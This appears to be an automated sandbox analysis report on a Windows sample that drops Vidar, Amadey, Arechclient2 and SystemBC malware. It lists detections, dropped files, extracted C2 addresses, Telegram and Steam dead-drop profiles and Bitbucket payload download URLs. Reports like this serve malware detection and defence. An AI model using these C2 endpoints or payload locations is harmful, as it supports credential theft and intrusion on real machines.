Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D945 sqlite3_bind_text64,	0_2_61E2D945
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D916 sqlite3_bind_text,	0_2_61E2D916
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D8E7 sqlite3_bind_blob64,	0_2_61E2D8E7
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E038CA sqlite3_bind_parameter_count,	0_2_61E038CA
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E158CA sqlite3_bind_parameter_index,	0_2_61E158CA
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E038DC sqlite3_bind_parameter_name,	0_2_61E038DC
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	Code function: 0_2_61E2D8B8 sqlite3_bind_blob,	0_2_61E2D8B8

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
8.8.8.8	unknown	United States	15169	GOOGLEUS	false
65.21.119.56	unknown	United States	199592	CP-ASDE	true
89.22.236.225	unknown	Russian Federation	197328	INETLTDTR	true
104.192.141.1	unknown	United States	16509	AMAZON-02US	false
45.159.188.118	unknown	Netherlands	14576	HOSTING-SOLUTIONSUS	false
54.231.164.65	unknown	United States	16509	AMAZON-02US	false
88.119.169.157	unknown	Lithuania	61272	IST-ASLT	false
85.209.135.109	unknown	Germany	33657	CMCSUS	true

Private

IP
192.168.2.3

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://65.21.119.56:80	true	Avira URL Cloud: malware	unknown
85.209.135.109/jg94cVd30f/index.php	true	Avira URL Cloud: safe	low
https://t.me/vmt001	false		high

AV Detection

Antivirus detection for URL or domain

Source: http://65.21.119.56:80	Avira URL Cloud: Label: malware
Source: http://65.21.119.56:80/update.zip	Avira URL Cloud: Label: malware
Source: http://65.21.119.56:80/update.zipb0dfc5b548762778904926-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963	Avira URL Cloud: Label: malware
Source: http://167.235.150.8:80	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\jekppnay.tmp

Avira: detection malicious, Label: HEUR/AGEN.1236196

Multi AV Scanner detection for submitted file

Source: DQxttu2Qrr.exe

ReversingLabs: Detection: 36%

Multi AV Scanner detection for dropped file

Source: C:\ProgramData\61312899942613011832.exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\1000019012\syncfiles.dll	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\syncfiles[1].dll	ReversingLabs: Detection: 23%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\umciavi64[1].exe	ReversingLabs: Detection: 17%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Emit64[1].exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\nppshell[1].exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Local\Temp\03bd543fce\gntuud.exe	ReversingLabs: Detection: 35%
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Local\Temp\advapi32.dll	ReversingLabs: Detection: 19%
Source: C:\Users\user\AppData\Local\Temp\jekppnay.tmp	ReversingLabs: Detection: 80%
Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	ReversingLabs: Detection: 17%
Source: C:\Users\user\Locktime\RtkAudUService64.exe	ReversingLabs: Detection: 26%

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\1000020000\umciavi64.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\umciavi64[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\Locktime\RtkAudUService64.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\advapi32.dll	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Emit64[1].exe	Joe Sandbox ML: detected

Source: 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp	Malware Configuration Extractor: Vidar {"C2 url": ["http://65.21.119.56:80", "https://t.me/vmt001"], "Botnet": "1760", "Version": "56.1"}
Source: 4.2.61312899942613011832.exe.1150000.0.unpack	Malware Configuration Extractor: Amadey {"C2 url": "85.209.135.109/jg94cVd30f/index.php", "Version": "3.50"}

Uses 32bit PE files

Source: DQxttu2Qrr.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: DQxttu2Qrr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Carafej mamib cemike\xiwati\Dedexaj wahiraje\jeweyohe kajexef.pdb source: umciavi64.exe, 00000031.00000002.647446249.0000000000D5E000.00000002.00000001.01000000.0000000F.sdmp, umciavi64.exe, 00000031.00000000.425031565.0000000000D5E000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\Desktop\DQxttu2Qrr.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Networking

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 192.168.2.3 80	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 89.22.236.225 4193
Source: C:\Windows\SysWOW64\rundll32.exe	Network Connect: 85.209.135.109 80	Jump to behavior

Yara detected Generic Downloader

Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 85.209.135.109/jg94cVd30f/index.php
Source: Malware configuration extractor	URLs: http://65.21.119.56:80
Source: Malware configuration extractor	URLs: https://t.me/vmt001

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: CP-ASDE CP-ASDE
Source: Joe Sandbox View	ASN Name: INETLTDTR INETLTDTR

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 89.22.236.225 89.22.236.225
Source: Joe Sandbox View	IP Address: 104.192.141.1 104.192.141.1
Source: Joe Sandbox View	IP Address: 104.192.141.1 104.192.141.1

Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://167.235.150.8:80
Source: DQxttu2Qrr.exe, 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://65.21.119.56:80
Source: DQxttu2Qrr.exe, 00000000.00000002.298542710.00000000004FD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://65.21.119.56:80/update.zip
Source: DQxttu2Qrr.exe, 00000000.00000002.298542710.00000000004FD000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: http://65.21.119.56:80/update.zipb0dfc5b548762778904926-d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963
Source: DQxttu2Qrr.exe, 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: http://65.21.119.56:80https://t.me/vmt001hello0;open_open
Source: umciavi64.exe, 00000031.00000002.649017901.00000000029E3000.00000040.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cjDliFVN3QKbi0ymi0MA.WclWOx4jCqZsNQbjvsAivMLJa9uT5DhrasATByTHQ5iENK14UsJkLrDsnRarngdZ7r0MiULb
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cjdlifvn3qkbi0ymi0ma.wclwox4jcqzsnqbjvs/
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cjdlifvn3qkbi0ymi0ma.wclwox4jcqzsnqbjvs/)a
Source: powershell.exe, 00000020.00000002.716445080.000001A0AC6A4000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: gntuud.exe, 0000000D.00000003.367330103.00000000016F0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ripple-wells-2022.net/
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000020.00000002.656197895.000001A094341000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: DQxttu2Qrr.exe, 00000000.00000002.325985352.0000000027895000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.331524675.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: avicapn32.exe, 0000001B.00000002.857905860.00000000017DE000.00000002.00000001.01000000.0000000B.sdmp	String found in binary or memory: http://www.zlib.net/D
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.569146497.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.568886955.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://aui-cdn.atlassian.com
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/E
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/H
Source: umciavi64.exe, 00000031.00000003.561824002.0000000000A19000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.562128012.0000000000A19000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/down.
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/downloads/b803c041-f8b5-
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/downloads/b97f81fe-0ba4-
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/f3ef24fc-08b2-408a-a2c5-1fad12572ea6/downloads/cba79466-746d-
Source: umciavi64.exe, 00000031.00000003.562072536.00000000009D8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/l
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/
Source: umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/D
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597
Source: umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.562128012.0000000000A19000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.631988058.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.642766425.00000000009B1000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/library.bin
Source: umciavi64.exe, 00000031.00000002.649017901.00000000029E3000.00000040.00000800.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/library.binIua2gnOxsYQNjWglYDZ3357MMJTmqF
Source: umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.bin
Source: umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.bin6
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.bin8
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.binR
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.binin
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/minor.binl
Source: umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.569146497.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.568886955.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bin
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bin0c9c7142b75e/library.bin
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bin8
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bind
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.591831541.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.binn
Source: umciavi64.exe, 00000031.00000002.643481075.00000000009BA000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.632274574.00000000009BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/alfolod79597/advancedapi32/downloads/resource.bint
Source: umciavi64.exe, 00000031.00000002.643957450.00000000009CF000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.627649701.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/versal
Source: umciavi64.exe, 00000031.00000003.629628004.0000000000966000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000002.641706708.0000000000966000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bitbucket.org/ww
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://d301sr5gafysq2.cloudfront.net;
Source: powershell.exe, 00000020.00000002.661457199.000001A094548000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000020.00000003.420288387.000001A095FA4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000020.00000002.719705380.000001A0AC974000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ion=v4.5
Source: powershell.exe, 00000020.00000002.707622809.000001A0A439D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: 61312899942613011832.exe, 00000004.00000003.307229091.0000000001061000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe	String found in binary or memory: https://sectigo.com/CPS0
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199441933804
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/111996?visit_id=637962485686793996-3320600880&p=update_erro
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/answer/6315198?product=
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome?p=update_error
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/installer/?product=
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/dishasta
Source: umciavi64.exe, 00000031.00000003.619550432.000000000F2F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/dishastahttps://steamcommunity.com/profiles/76561199441933804http://167.235.150.8:80dis
Source: DQxttu2Qrr.exe, 00000000.00000002.300367960.00000000010C5000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: https://t.me/vmt001
Source: umciavi64.exe, 00000031.00000003.567296026.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.569146497.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.568886955.0000000000A1A000.00000004.00000020.00020000.00000000.sdmp, umciavi64.exe, 00000031.00000003.554465568.00000000009C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
Source: DQxttu2Qrr.exe, 00000000.00000002.328859576.0000000027DCD000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/
Source: DQxttu2Qrr.exe, 00000000.00000003.264721352.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/https://www.google.com/intl/en_uk/chrome/https://www.google
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows
Source: DQxttu2Qrr.exe, 00000000.00000002.328642046.0000000027CBE000.00000004.00000800.00020000.00000000.sdmp, DQxttu2Qrr.exe, 00000000.00000003.264518594.0000000027ACD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=chrome&oq=chrome&aqs=chrome..69i57j0j5l3j69i60l3.2663j0j4&sourceid=c

Creates a DirectInput object (often for capturing keystrokes)

Source: 61312899942613011832.exe, 00000004.00000002.326390178.000000000084A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Spam, unwanted Advertisements and Ransom Demands

Modifies the hosts file

Source: C:\Users\user\AppData\Local\Temp\1000017001\Emit64.exe

File written: C:\Windows\System32\drivers\etc\hosts

System Summary

Malicious sample detected (through community Yara rule)

Source: 49.3.umciavi64.exe.f0d0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 49.3.umciavi64.exe.f0d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 49.3.umciavi64.exe.f0d0000.1.unpack, type: UNPACKEDPE	Matched rule: Detects Arechclient2 RAT Author: ditekSHen
Source: 44.2.rundll32.exe.10000000.0.unpack, type: UNPACKEDPE	Matched rule: Detects SystemBC Author: ditekSHen
Source: 00000031.00000003.539665627.000000000F0D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects Arechclient2 RAT Author: ditekSHen

PE file contains section with special chars

Source: 61312899942613011832.exe.0.dr	Static PE information: section name: lB@dO\ih
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: Fh?jG[OJ
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: qNR5:WbS
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: z?fd8ijJ
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: CV?7x>JO
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: dT<:EHzj
Source: 61312899942613011832.exe.0.dr	Static PE information: section name: @]topACL
Source: nppshell[1].exe.0.dr	Static PE information: section name: lB@dO\ih
Source: nppshell[1].exe.0.dr	Static PE information: section name: Fh?jG[OJ
Source: nppshell[1].exe.0.dr	Static PE information: section name: qNR5:WbS
Source: nppshell[1].exe.0.dr	Static PE information: section name: z?fd8ijJ
Source: nppshell[1].exe.0.dr	Static PE information: section name: CV?7x>JO
Source: nppshell[1].exe.0.dr	Static PE information: section name: dT<:EHzj
Source: nppshell[1].exe.0.dr	Static PE information: section name: @]topACL
Source: gntuud.exe.4.dr	Static PE information: section name: lB@dO\ih
